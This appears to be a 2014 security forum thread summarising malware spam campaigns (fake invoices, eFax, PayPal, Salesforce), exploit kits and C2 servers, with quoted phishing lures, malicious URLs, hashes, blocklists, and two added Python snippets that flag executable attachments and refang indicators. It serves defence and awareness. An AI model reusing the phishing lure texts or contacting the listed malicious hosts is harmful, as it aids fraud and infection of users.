Based on our analyses of the campaign, we were able to identify that this version of Sweet Orange uses vulnerabilities in Internet Explorer. The URL of the actual payload constantly changes, but they all use subdomains on the same Polish site mentioned earlier. However, the behavior of these payloads is identical. The final payloads of this attack are variants of the KOVTER malware family, which are detected as TROJ_KOVTER.SM. This particular family is known for its use in various ransomware attacks, although they lack the encryption of more sophisticated attacks like Cryptolocker. The websites that TROJ_KOVTER.SM accesses in order to display the fake warning messages are no longer accessible. Users who keep their systems up to date will not be affected by this attack, as Microsoft released a patch for this particular vulnerability in May 2013. We recommend that users read and apply the software security advisories by vendors like Microsoft, Java, and Adobe, as old vulnerabilities are still being exploited by attackers. Applying the necessary patches is an essential part of keeping systems secure..."

:mad: :fear::fear:

AplusWebMaster
2014-10-15, 14:58
FYI...

Fake delivery SPAM - word doc malware ...
- http://myonlinesecurity.co.uk/inform-package-way-fake-word-doc-malware/
15 Oct 2014 - "An email pretending that you have purchased an unspecified item from an unspecified store saying 'This is to inform you that the package is on its way to you' coming from random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Thank you for buying at our store!
Date ordered: October 14 2014
This is to inform you that the package is on its way to you. We also included delivery file to your shipping address.
Payment Nr : 7795816097 Order total : 527.54 USD Delivery date : 10/ 22th 2014.
Please review the attached document.

15 October 2014: 0048898757_order _doc.zip: Extracts to: 0048898757_order _doc.exe
Current Virus total detections: 7/54* . This 'This is to inform you that the package is on its way to you' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8c41235f43356c845b193b04efa60bbecb1787028e8ad6e25eb4c01ee2d94804/analysis/1413361301/
___

Fake 'Shipping Info' SPAM
- http://blog.dynamoo.com/2014/10/shipping-information-for-spam-uses.html
15 Oct 2014 - "This fake shipping spam contains malware.. although it appears that it may be buggy and might not install properly.

Screenshot: https://3.bp.blogspot.com/-l3nlpqmPSoo/VD6K3ZdvApI/AAAAAAAAF1E/a_k4VUkXNX0/s1600/shipping-info.png

The link in the email goes to https ://www.google .com/url?q=https%3A%2F%2Fcopy.com%2FEl9fd4VfLkfN%2FTrackShipment_0351.PDF.scr%3Fdownload%3D1&sa=D&sntz=1&usg=AFQjCNE0-3UrX7jNPzSGYodsQVzmBhrwMA which bounces through Google and then downloads a malicious executable TrackShipment_0351.PDF.scr which has a VirusTotal detection rate of 4/54*... What I think is meant to happen is that a malicious script that has been disguising itself as a GIF file which then renames a component Gl.png to Gl.exe and then attempts to execute it... This executable has a VirusTotal detection rate of 2/53**. It bombs out of automated analysis tools... possibly because it is being executed with the wrong parameters. It also opens a seemingly legitimate PDF file (VT 0/54***) which is designed to look like a Commercial Invoice, presumably to mask the fact that it is doing something malicious in the background.
> https://4.bp.blogspot.com/-86SXLSZk37U/VD6PBROpsAI/AAAAAAAAF1c/ZRCiUJev-KI/s1600/commerical-invoice.png
If you opened a file similar to this and you saw a PDF with a blank Commercial Invoice like the one pictured above, then you've probably been -infected- by the executable running in the background."
* https://www.virustotal.com/en-gb/file/e5f0ea546dcfb99803c9a02df82f587fa09b16c87337e868d8eabf360178ba59/analysis/1413383394/

** https://www.virustotal.com/en-gb/file/f9cca52c9d840f3cfc8997e77a42ebc7640ea71f7729fa1782d8596a05ed963b/analysis/1413384221/

*** https://www.virustotal.com/en-gb/file/409e472b667ae747942e10d4dc691796c3b2eb00a0e407146e69b2f8205de40c/analysis/1413384174/
___

Fake Paypal SPAM – PDF malware
- http://myonlinesecurity.co.uk/paypal-transaction-complete-fake-pdf-malware/
15 Oct 2014 - "'Transaction not complete' pretending to come from PayPal is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

Unable to complete your most recent Transaction.
Currently your transaction has a pending status.
If the transaction was made by mistake please contact our customer service.
For more details please see attached payment receipt .

15 October 2014: Transaction25765048.zip: Extracts to: Transaction_21633987.scr
Current Virus total detections: 7/54* . This 'Transaction not complete' pretending to come from PayPal is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4b742cf87e49bc1cca0ce474ac34dd04ae00e28783aeafcfcd5a45a369be6543/analysis/1413387437/

:fear: :mad:

AplusWebMaster
2014-10-16, 23:23
FYI...

Fake Bank SPAM
- http://blog.dynamoo.com/2014/10/barclays-bank-transaction-not-complete.html
16 Oct 2016 - "This fake Barclays spam leads to malware.
From: Barclays Bank [Barclays@email .barclays .co.uk]
Date: 16 October 2014 12:48
Subject: Transaction not complete
Unable to complete your most recent Transaction.
Currently your transaction has a pending status. If the transaction was made by mistake please contact our customer service.
For more details please download payment receipt below...

Clicking on the link downloads a file document23_pdf.zip containing a malicious executable document23_pdf.scr which has a VirusTotal detection rate of 4/54*. The Malwr report shows that it reaches out to the following URLs:
http ://188.165.214.6 :12302/1610uk1/HOME/0/51-SP3/0/
http ://188.165.214.6 :12302/1610uk1/HOME/1/0/0/
http ://188.165.214.6 :12302/1610uk1/HOME/41/5/1/
http ://jwoffroad .co.uk/img/t/1610uk1.osa
In my opinion 188.165.214.6 (OVH, France) is an excellent candidate to -block- or monitor. It also drops two executables, bxqyy.exe (VT 5/54** ...) and ldplh.exe (VT 1/51*** ...)."
* https://www.virustotal.com/en/file/626687777469a5a1cca0303fd565ee230fb5f5799a6d8cbaec097a5f7266eb28/analysis/1413462043/
... Behavioural information
DNS requests
jwoffroad .co.uk (88.208.252.216)
TCP connections
188.165.214.6: https://www.virustotal.com/en/ip-address/188.165.214.6/information/
88.208.252.216: https://www.virustotal.com/en/ip-address/88.208.252.216/information/

** https://www.virustotal.com/en/file/8d5d66e390e2293bec87422dfa2f4683b423e8084a07de207a75d2831f88d9a8/analysis/1413462507/

*** https://www.virustotal.com/en/file/752afd97f0473ec909797c02ac49b3f33e94ca06d6678af517d6d2fe98e00341/analysis/1413462517/
___

Many .su and .ru domains leading to malware
- http://blog.dynamoo.com/2014/10/a-bunch-of-su-and-ru-domains-leading-to.html
16 Oct 2016 - "These sites lead to some sort of malware. The presence of .SU domains hosted on what looks like a botnet is probably all you need to know.... recommend watching out for these..."
(Long list at the dynamoo URL above.)

- https://www.abuse.ch/?p=3581

- http://blog.dynamoo.com/2013/03/zbot-sites-to-block.html
"The obsolete .su (Soviet Union) domain is usually a tell-tale sign..."

___

Fake Invoice SPAM
- http://myonlinesecurity.co.uk/re-invoice-4023390-fake-pdf-malware/
16 Oct 2016 - "'RE: Invoice #4023390' pretending to come from Sage Accounting < Alfonso.Williamson@ sage-mail .com >is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

Please see attached copy of the original invoice.

16 October 2014: Invoice_4017618.zip: Extracts to: Invoice_4017618.exe
Current Virus total detections: 5/54*. This RE: Invoice #4023390 is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e9645b9120975b47e440f60c182e4701e14c9f653a55bb0b4bec82bb71fe1c2d/analysis/1413490281/
... Behavioural information
DNS requests
lewis-teck .co.uk (5.77.44.47)
TCP connections
188.165.214.6: https://www.virustotal.com/en/ip-address/188.165.214.6/information/
5.77.44.47: https://www.virustotal.com/en/ip-address/5.77.44.47/information/

:fear::fear: :mad:
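
Several of the posts above (the PayPal, Barclays and Sage invoice runs) turn on the same trick: a .scr or .exe carrying a PDF or Excel icon, sometimes with a second extension such as .xls.exe, that Windows shows without its real extension unless "show known file extensions" is enabled. The following is an added example (not code from any of the quoted blogs) of the check a mail gateway or triage script can do on the attachment names alone: classify every member of a ZIP by its last extension, which is the only one Windows uses to pick the handler. The extension lists are an assumption, not an exhaustive set, and the sample archive is constructed here with placeholder text, not the real attachments.

```python
import io
import zipfile

# Assumed lists (added here, not from the original posts): extensions Windows
# will run on double-click, and the document/image extensions the spoofed
# icons in the posts imitate.
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "vbs", "js", "jar", "cpl", "msi"}
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "jpeg", "png", "gif"}


def classify_attachment(name: str) -> dict:
    """Classify one attachment by its real (last) extension.

    Windows chooses the handler from the last extension only, so
    'TrackShipment_0351.PDF.scr' is a screensaver executable no matter what
    icon it carries or what the hidden-extensions view shows.
    """
    base = name.replace("\\", "/").rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    real_ext = parts[-1] if len(parts) > 1 else ""
    inner_exts = set(parts[1:-1])
    executable = real_ext in EXECUTABLE_EXTS
    return {
        "name": name,
        "real_ext": real_ext,
        "executable": executable,
        # double extension such as .xls.exe: looks like a document, runs as code
        "double_extension": executable and bool(inner_exts & DOCUMENT_EXTS),
    }


def scan_zip(data: bytes) -> list:
    """Verdicts for every member of a ZIP attachment (names only; the member
    contents are never extracted to disk or executed)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [classify_attachment(n) for n in zf.namelist()]


def flagged_members(data: bytes) -> list:
    """Names of members a gateway should quarantine: anything executable."""
    return [v["name"] for v in scan_zip(data) if v["executable"]]


def build_sample_zip() -> bytes:
    """Constructed sample archive: the member names mirror the posts above,
    the contents are inert placeholder text, not the malware."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for member in ("Invoice_7380901925299.xls.exe",
                       "Transaction_21633987.scr",
                       "adb-102288-invoice.doc"):
            zf.writestr(member, "placeholder, not the real attachment")
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_zip()
    for verdict in scan_zip(sample):
        print(verdict)
    print("quarantine:", flagged_members(sample))
```

The point of keying on the last extension rather than on the icon or the MIME type is that it is exactly what the user cannot see when extensions are hidden; a plain .exe with a PDF icon (the Invoice_4017618.exe case) is caught by the same rule even though it has no double extension.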

AplusWebMaster
2014-10-17, 13:50
FYI...

Fake Sage Invoice SPAM - malware
- http://blog.dynamoo.com/2014/10/sage-outdated-invoice-spam-spreads.html
17 Oct 2014 - "This -fake- Sage email spreads malware using a service called Cubby, whatever that is.

Screenshot: https://2.bp.blogspot.com/-UFvbcQMZeqc/VEDn4-OJqZI/AAAAAAAAF2I/M7n6GtqZVRM/s1600/sage3.png

Despite appearances, the link in the email (in this case) actually goes to https ://www.cubbyusercontent .com/pl/Invoice_032414.zip/_8deb77d3530f43be8a3166544b8fee9d and it downloads a file Invoice_032414.zip. This in turn contains a malicious executable Invoice_032414.exe which has a VirusTotal detection rate of 3/53*. The Malwr report shows HTTP conversations with the following URLs:
http :// 188.165.214.6 :15600/1710uk3/HOME/0/51-SP3/0/
http :// 188.165.214.6 :15600/1710uk3/HOME/1/0/0/
http :// 188.165.214.6 :15600/1710uk3/HOME/41/5/1/
http :// tonysenior .co.uk/images/IR/1710uk3.osa
188.165.214.6 is (not surprisingly) allocated to OVH France. In turn, it drops an executable bcwyw.exe (VT 6/54**...) which communicates with 66.102.253.25 (a China Telecom address located in the US in a Rackspace IP range) and also moxbk.exe (VT 1/52***...).
Recommended blocklist:
188.165.214.6
66.102.253.25
tonysenior .co.uk "
* https://www.virustotal.com/en-gb/file/a772bdadac8a2f4819519e3ffb10a4aca141d64d78660e78e6f42a6ceb509183/analysis/1413539374/
... Behavioural information
DNS requests
tonysenior .co.uk (66.7.214.212)
TCP connections
188.165.214.6: https://www.virustotal.com/en-gb/ip-address/188.165.214.6/information/
66.7.214.212: https://www.virustotal.com/en-gb/ip-address/66.7.214.212/information/

** https://www.virustotal.com/en-gb/file/30dc00ee245dc553d569b94cc13f1acfed70740c7c10405d164694bc7d065f9d/analysis/1413540238/

*** https://www.virustotal.com/en-gb/file/3a281070d196e0906851550c51c319843c0c99198a2f7b2e393e433aa0cb0b68/analysis/1413540261/
___

Fake 'SalesForce Security Update' SPAM – malware
- http://myonlinesecurity.co.uk/october-17-2014-salesforce-security-update-malware/
17 Oct 2014 - "'October 17, 2014 SalesForce Security Update' pretending to come from SalesForce .com <no-reply@ salesforce .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The malware inside this zip file is at this time -undetected- by any antivirus on Virus Total* and to make it much worse the Virus Total engine tries to tell you that the file is Probably harmless! There are strong indicators suggesting that this file is safe to use. This is an even bigger problem than it normally would be because of the recent Poodle bug and servers consequently changing their encryption routines to remove the vulnerable SSLv3 version from being used. It is eminently believable that you might need to change the SSL certificate on your browser to comply with the new behaviour if you are not a security or network IT specialist. This is obviously -wrong- and this type of malware that disguises itself as a legitimate file and can apparently conceal the malicious functions from an antivirus scan and make it believe it is innocent is very worrying. The MALWR analysis doesn’t show -anything- wrong and doesn’t show any network connections or other files downloaded. Anubis also comes up with a -nothing- on this one... a couple of manual analyses done by Virus total** users who find it -is- malicious... drops this file which -is- detected... Our friends at TechHelpList(1) have done an analysis on this one which clearly shows its bad behaviour and what it connects to and downloads...
* https://www.virustotal.com/en/file/9519da9cbbf2a13b24e807f40d1537bb1913818ea91ecfe95323326f96632617/analysis/1413556548/

** https://www.virustotal.com/en/file/93691ef6e834951225ad024a6b662e857a47c2f5156e3def9f38ae964143c241/analysis/

1) https://techhelplist.com/index.php/spam-list/664-date-salesforce-security-update-virus

The email looks like:
Dear client,
You are receiving this notification because your Salesforce SSL certificate has expired.
In order to continue using Salesforce.com, you are required to update your digital certificate.
Download the attached certificate. Update will be automatically installed by double click.
According to our Terms and Conditions, failing to renew the SSL certificate will result in account suspension or cancelation... Thank you for using Salesforce .com

17 October 2014: cert_update.zip: Extracts to: cert_update.scr
Current Virus total detections: 0/52*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like an icon of a white & red circular arrow instead of the .scr ( executable) file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/9519da9cbbf2a13b24e807f40d1537bb1913818ea91ecfe95323326f96632617/analysis/1413556548/
___

Fake eFax SPAM
- http://blog.dynamoo.com/2014/10/efax-message-from-02086160204-spam.html
17 Oct 2014 - "This fake eFax spam leads to malware:
From: eFax [message@ inbound .claranet .co.uk]
Date: 17 October 2014 11:36
Subject: eFax message from "02086160204" - 1 page(s), Caller-ID: 208-616-0204
Fax Message [Caller-ID: 208-616-0204]
You have received a 1 page fax at 2014-10-17 09:34:48 GMT.
* The reference number for this fax is lon2_did11-4056638710-9363579926-02.
Please visit... to view this message in full...

The link in the email goes to some random hacked WordPress site or other with a URL with a format similar to the following:
http ://tadarok .com/wp-content/themes/deadline/mess.html
http ://107.170.219.47 /wp-content/themes/inove/mess.html
http ://dollfacebeauty .com.au/wp-content/themes/landscape/mess.html
Then (if your user agent and referrer are correct) it goes to a -fake- eFax page at http ://206.253.165.76 :8080/ord/ef.html which does look pretty convincing. (Incidentally if the UA or referrer are not right you seem to get dumped on a pills site of naturaldietpills4u .com).

Screenshot: https://1.bp.blogspot.com/-IzglVG8I_co/VED-m9ehHQI/AAAAAAAAF2Y/HyA5Tk30D9E/s1600/efax2.png

The download link goes to http ://206.253.165.76: 8080/ord/FAX_20141008_1412786088_26.zip which is a ZIP file containing a malicious executable FAX_20141008_1412786088_26.exe which has a VirusTotal detection rate of 4/54*... Recommended blocklist:
107.170.19.156
212.59.117.207
206.253.165.76 "
* https://www.virustotal.com/en-gb/file/b2b9486a36dff94a3222c16d309c073da61a98dfa1c1d303b5d3740f54842ff6/analysis/1413545028/
___

Fake Virgin Media SPAM - phish/malware
- http://myonlinesecurity.co.uk/help-advice-virgin-media-malware/
17 Oct 2014 - "An email with a subject of 'Help & Advice – Virgin Media' pretending to come from Virgin Media is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Virgin Media Automated Billing Reminder
Date 17th October 2014
This e-mail has been sent you by Virgin Media to inform you that we were unable to process your most recent payment of bill. This might be due to one of the following reasons:
A recent change in your personal information such as Name or address.
Your Credit or Debit card has expired.
Insufficient funds in your account.
Cancellation of Direct Debit agreement.
Your Card issuer did not authorize this transaction.
To avoid Service interruption you will need to update your billing profile, failure to update your profile may lead in service cancellation and termination.
Please click on the link below to login to e-Billing. You will need to login using your primary E-mail address...

Be very careful with email attachments. -All- of these emails use Social engineering tricks to persuade you to open the attachments or follow the links... -Never- just blindly click on the file in your email program. Always save the file to your downloads folder, so you can check it first. Most ( if not all) malicious files that are attached to emails will have a -faked- extension..."
___

More Free Facebook Hacks ...
- https://blog.malwarebytes.org/fraud-scam/2014/10/more-free-facebook-hacking-sites-surface-online/
Oct 16, 2014 - "... more sites claiming to offer hacking services that target Facebook users. The sites are:
fbwand(dot)com
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/fbwand.png

hackfbaccountlive(dot)com
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/hackfbaccountlive.png

One starts off by entering the profile URL of the Facebook user account (the target) he/she wants to hack. The site then makes him/her believe that an -actual- hacking is ongoing, firstly, by retrieving and displaying specific information from Facebook’s Graph Search*, such as user ID, user name, and a large version of the profile photo, to the page; and, secondly, by providing the attacker the progress of completion of each hacking attempt. Below are screenshots of these attempts, beginning with purportedly fetching the target’s email ID:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/05-verify.png?w=564
After a successful “hack”, the site informs the attacker that they have created an account for them on the website, complete with a generated user name and password, and that they have to log in to their accounts to retrieve the target’s Facebook account details. Just when it seems too easy, the attacker sees this upon logging in:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/hackers-panel.png
He/She is instructed to unlock the details in two ways. One is to share a generated referral link to their social networks (particularly Facebook and/or Twitter) in order to get 15 visitors to click it... Although it’s true that no website is perfectly secure, one must not attempt to hack into them nor break into someone else’s online profile. These are illegal acts. Sites marketing themselves as free, user-friendly hacking-as-a-service (HaaS) tools, such as those I mentioned here, generally take advantage of user distrust against someone and profit on it, promising big but delivering nothing in the end. Avoid them at all cost."
* https://www.facebook.com/about/graphsearch
___

Ebola Phishing Scams and Malware Campaigns
- https://www.us-cert.gov/ncas/current-activity/2014/10/16/Ebola-Phishing-Scams-and-Malware-Campaigns
Oct 16, 2014 - "... protect against email scams and cyber campaigns using the Ebola virus disease (EVD) as a theme. Phishing emails may contain links that direct users to websites which collect personal information such as login credentials, or contain malicious attachments that can infect a system. Users are encouraged to use caution when encountering these types of email messages and take the following preventative measures to protect themselves:
- Do not follow unsolicited web links or attachments in email messages.
- Maintain up-to-date antivirus software..."
___

CUTWAIL Spambot Leads to UPATRE-DYRE Infection
- http://blog.trendmicro.com/trendlabs-security-intelligence/cutwail-spambot-leads-to-upatre-dyre-infection/
Oct 16, 2014 - "... new spam attack disguised as invoice message notifications was recently seen spreading the UPATRE malware, that ultimately downloads its final payload, a BANKER malware related to the DYREZA/DYRE banking malware... In early October we observed a surge of spammed messages sent by the botnet CUTWAIL/PUSHDO, totaling more than 18,000 messages seen in a single day. CUTWAIL/PUSHDO has been in the wild since as early as 2007 and was considered one of the biggest spam botnets in 2009. We spotted some spammed emails that disguise themselves as invoice message notifications or “new alert messages” from various companies and institutions.
Screenshot of spammed messages related to CUTWAIL/PUSHDO:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/Cutwail_samples.jpg
Top spam sending countries for this CUTWAIL spam run:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/Top-spam-sending-countries-01.jpg
... Based on our 1H 2014 spam report, UPATRE is the top malware seen in spam emails. With its continuously developing techniques, UPATRE remains as one of most prevalent malware today. Examples of newer UPATRE techniques are its ability to use password-protected archives as attachments, and abuse of online file storage platform, Dropbox in order to bypass spam filters.
Top malware distributed via spam as of August 2014:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/CUTWAIL-Spambot_fig1.jpg
... in this attack, this UPATRE variant, TROJ_UPATRE.YYJS downloads the final payload, TSPY_BANKER.COR, which is related to DYREZA/DYRE banking malware. The DYREZA malware is a banking malware with the following capabilities:
- Performs man-in-the-middle attacks via browser injections
- Steals banking credentials and monitors online banking session/transactions
- Steals browser snapshots and other information
Based on our analysis, TSPY_BANKER.COR connects to several websites to receive and send information. Given this series of malware infections, affected systems also run the risk of having their sensitive data stolen (such as banking credentials data) in order to be used for other future attacks. Apart from the risk of stolen information, this spam attack also highlights the risk of traditional threats (like spam) being used as a vehicle for -other- advanced malware to infect systems. This may consequently even lead to infiltrating an entire enterprise network... We highly recommend that users take extra caution when dealing with emails that contain attachments and URLs in the email body. Ensure that the domains are legitimate and take note of the company name indicated in the email. Another tip is to steer clear of suspicious-looking archive files attached to emails, such as those ending in .ZIP, or .RAR. UPATRE is also known to use email templates through DocuSign with emails that come in the form of -bank- notifications, -court- notices, and -receipts- ..."
___

WhatsApp Spam
- http://threattrack.tumblr.com/post/100162392338/whatsapp-spam
Oct 16, 2014 - "Subjects Seen:
Voice Message Notification
Typical e-mail details:
You have a new voicemail!
Details:
Time of Call: Oct-13 2014 06:02:04
Lenth of Call: 07sec

Malicious URLs:
p30medical .com/dirs.php?rec=LLGIAmEUFLipINmiPz4S0g
Malicious File Name and MD5:
VoiceMail.zip (713A7D2A9930B786FE31A603CD06B196)
VoiceMail.exe (2B7E9FC5A65FE6927A84A35B5FEAC062)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/5fe4acaac97621cafb4688b950049ac6/tumblr_inline_ndjlwzSYyI1r6pupn.png

Tagged: Whatsapp, Kuluoz

:fear::fear: :mad:
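
The blocklists quoted in this post (the Barclays, Sage and eFax runs, and the Malwarebytes and ThreatTrack items) are all written defanged: "http ://host :port", "hxxp", "(dot)" and spaces before dots. Before any of it can go into a firewall or proxy rule the indicators have to be refanged and de-duplicated into plain hosts. The following is an added example, not code from any of the quoted blogs, of that normalisation: it undoes the usual defanging conventions, parses out the host and port, sorts hosts into IP addresses and domains, and builds a blocklist from the URLs quoted above. The regular-expression rules are an assumption about the defanging styles seen on this page, not a complete catalogue of every convention in use.

```python
import ipaddress
import re
from urllib.parse import urlsplit


def refang(text: str) -> str:
    """Undo the defanging used in the posts: hxxp, (dot)/[.]/[dot], and spaces
    inserted around '://', before dots, after '@' and before a port."""
    s = text.strip()
    s = re.sub(r"hxxp", "http", s, flags=re.IGNORECASE)                 # hxxp(s) -> http(s)
    s = re.sub(r"\((?:dot)\)|\[(?:dot|\.)\]", ".", s, flags=re.IGNORECASE)
    s = re.sub(r"\s*:\s*//\s*", "://", s)         # "http :// host"     -> "http://host"
    s = re.sub(r"\s+\.", ".", s)                  # "tonysenior .co.uk" -> "tonysenior.co.uk"
    s = re.sub(r"@\s+", "@", s)                   # "user@ host.com"    -> "user@host.com"
    s = re.sub(r"\s*:\s*(?=\d+(?:/|$))", ":", s)  # "host :8080/"       -> "host:8080/"
    return s


def indicator(text: str) -> dict:
    """Refang one line and pull out the host, port and whether it is an IP."""
    url = refang(text)
    # bare hosts such as "fbwand(dot)com" carry no scheme; give urlsplit a
    # network-path prefix so the hostname is still parsed
    parts = urlsplit(url if "://" in url else "//" + url)
    host = parts.hostname or ""
    try:
        ipaddress.ip_address(host)
        kind = "ip"
    except ValueError:
        kind = "domain"
    return {"url": url, "host": host, "port": parts.port, "kind": kind}


def blocklist(lines) -> dict:
    """Collapse many defanged URLs into the unique hosts to block, split into
    IP addresses and domain names (sorted, duplicates removed)."""
    out = {"ip": set(), "domain": set()}
    for line in lines:
        ind = indicator(line)
        if ind["host"]:
            out[ind["kind"]].add(ind["host"])
    return {kind: sorted(hosts) for kind, hosts in out.items()}


# Indicators quoted in the posts above, still in their defanged form.
SAMPLE_LINES = [
    "http ://188.165.214.6 :12302/1610uk1/HOME/0/51-SP3/0/",
    "http ://jwoffroad .co.uk/img/t/1610uk1.osa",
    "http :// tonysenior .co.uk/images/IR/1710uk3.osa",
    "hxxp ://206.253.165.76 :8080/ord/rot.php",
    "fbwand(dot)com",
    "p30medical .com/dirs.php?rec=LLGIAmEUFLipINmiPz4S0g",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(indicator(line))
    print(blocklist(SAMPLE_LINES))
```

Keeping IPs and domains apart matters because they go to different controls: the IP list suits a firewall or proxy deny rule (and, as dynamoo notes for 188.165.214.6, a monitoring rule), while the domain list belongs in DNS sinkholing or a web filter, where the hacked WordPress hosts will keep changing but the C2 addresses tend to persist across runs.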

AplusWebMaster
2014-10-19, 07:00
FYI...

Evil network: 5.135.230.176/28 - OVH
- http://blog.dynamoo.com/2014/10/evil-network-513523017628-ovh-eldar.html
18 Oct 2014 - "These domains are currently hosted or have recently been hosted on 5.135.230.176/28 and all appear to be malicious in some way, in particular some of them have been hosting the Angler EK* (hat tip)... 5.135.230.176/28 is an OVH IP range allocated to what might be a fictitious customer:
organisation: ORG-EM25-RIPE
org-name: eldar mahmudov
org-type: OTHER
address: ishveran 9
address: 75003 paris
address: FR
e-mail: mahmudik@ hotmail .com
abuse-mailbox: mahmudik@ hotmail .com
phone: +33.919388845
mnt-ref: OVH-MNT
mnt-by: OVH-MNT
changed: noc@ ovh .net 20140621
source: RIPE
There appears to be nothing legitimate at all in this IP address range, I strongly recommend that you -block- traffic going to it."
* http://malware-traffic-analysis.net/2014/10/06/index.html

Diagnostic page for AS16276 (OVH)
- https://www.google.com/safebrowsing/diagnostic?site=AS:16276
"... over the past 90 days, 4009 site(s)... resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2014-10-18, and the last time suspicious content was found was on 2014-10-18... we found 543 site(s) on this network... that appeared to function as intermediaries for the infection of 4498 other site(s)... We found 1150 site(s)... that infected 2883 other site(s)..."
___

malwr
- https://malwr.com/
Oct. 19, 2014 - "Last Comments:
Malware.
222.236.47.53:8080 195.206.7.69:443 46.55.222.24:8080 162.144.60.252:8080 91.212.253.253:443 95.141.32.134:8080"
- https://malwr.com/about/ >> http://www.shadowserver.org/ *

- 222.236.47.53: https://www.virustotal.com/en/ip-address/222.236.47.53/information/
- 195.206.7.69: https://www.virustotal.com/en/ip-address/195.206.7.69/information/
- 46.55.222.24: https://www.virustotal.com/en/ip-address/46.55.222.24/information/
- 162.144.60.252: https://www.virustotal.com/en/ip-address/162.144.60.252/information/
- 91.212.253.253: https://www.virustotal.com/en/ip-address/91.212.253.253/information/
- 95.141.32.134: https://www.virustotal.com/en/ip-address/95.141.32.134/information/

Bot Count Graphs
* https://www.shadowserver.org/wiki/pmwiki.php/Stats/BotCountYearly#toc1
Page last modified on Sunday, 19 October 2014
___

- http://blog.dynamoo.com/2014/10/final-notification-malware-spam-uses.html
17 Oct 2014
... ShippingLable_HSDAPDF.scr
- https://www.virustotal.com/en/file/9ad980467347dffbb50493c93ca834c40dbfdec61fc1339004a107aef6633ed2/analysis/1413566277/
... Comments:
Full list of CnCs:
5.135.28.118: https://www.virustotal.com/en/ip-address/5.135.28.118/information/
185.20.226.41: https://www.virustotal.com/en/ip-address/185.20.226.41/information/
5.63.155.195: https://www.virustotal.com/en/ip-address/5.63.155.195/information/
___

RIG Exploit Kit Dropping CryptoWall 2.0
- http://www.threattracksecurity.com/it-blog/rig-exploit-kit-dropping-cryptowall-2-0/
Oct 17, 2014 - "... observed spammers exploiting vulnerable WordPress links to -redirect- users to servers hosting the RIG Exploit Kit, which takes advantage of any number of vulnerabilities in unpatched Silverlight, Flash, Java and other applications to drop CryptoWall 2.0... nasty updated version of CryptoWall, which has built up steam since the disruption of CryptoLocker. Once infected with CryptoWall 2.0, users’ files are encrypted and held for ransom. The spammers behind this latest campaign seem to be the same crew behind a recent wave of eFax spam reported over at Dynamoo’s Blog*... The campaign Dynamoo revealed is being hosted side-by-side on the same server as the RIG Exploit Kit: hxxp ://206.253.165.76 :8080. The exploit redirector is hxxp ://206.253.165.76 :8080/ord/rot.php. And the spam Dynamoo reported is hxxp ://206.253.165.76 :8080/ord/ef.html... The exploit redirector is hxxp :// 206.253.165.76 :8080/ord/rot.php... malicious link loads a RIG Exploit Kit landing page to exploit any of its targeted vulnerabilities to drop CryptoWall 2.0. The MD5 of the sample analyzed is 8cc0ccec8483dcb9cfeb88dbe0184402 ..."
* http://blog.dynamoo.com/2014/10/efax-message-from-02086160204-spam.html

206.253.165.76: https://www.virustotal.com/en/ip-address/206.253.165.76/information/

:mad: :fear:

AplusWebMaster
2014-10-20, 14:41
FYI...

Fake 'unpaid invoice' SPAM - xls malware
- http://myonlinesecurity.co.uk/acorn-engineering-limited-trading-unpaid-invoice-court-action-fake-excel-xls-malware/
20 Oct 2014 - "An email pretending to be an unpaid invoice and threatening court action with a subject of 'Acorn Engineering Limited trading' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Acorn-Maintenance-Engineering-logo...
October 20, 2014
Head Office
Acorn Engineering Limited trading
as Acorn Maintenance
Acorn House
20 Wellcroft Road
Slough
Berkshire
SL1 4AQ
Tel: 01753 386 073
Fax: 01753 409 672
Dear ...
Reference: 48771955-A8
Court action will be the consequence of your ignoring this letter.
Despite our telephone calls on October 10 and our letters of September 25, 2014 and October 20, 2014, and your promise to pay, payment of your account has still not been received. If full payment is not received by October 22, 2014 court action will be taken against your company.
If you allow this to happen you will incur court costs and you may forfeit your company’s credit status because the name of your company will be recorded by the major credit reference agencies. This may deter others from supplying you.
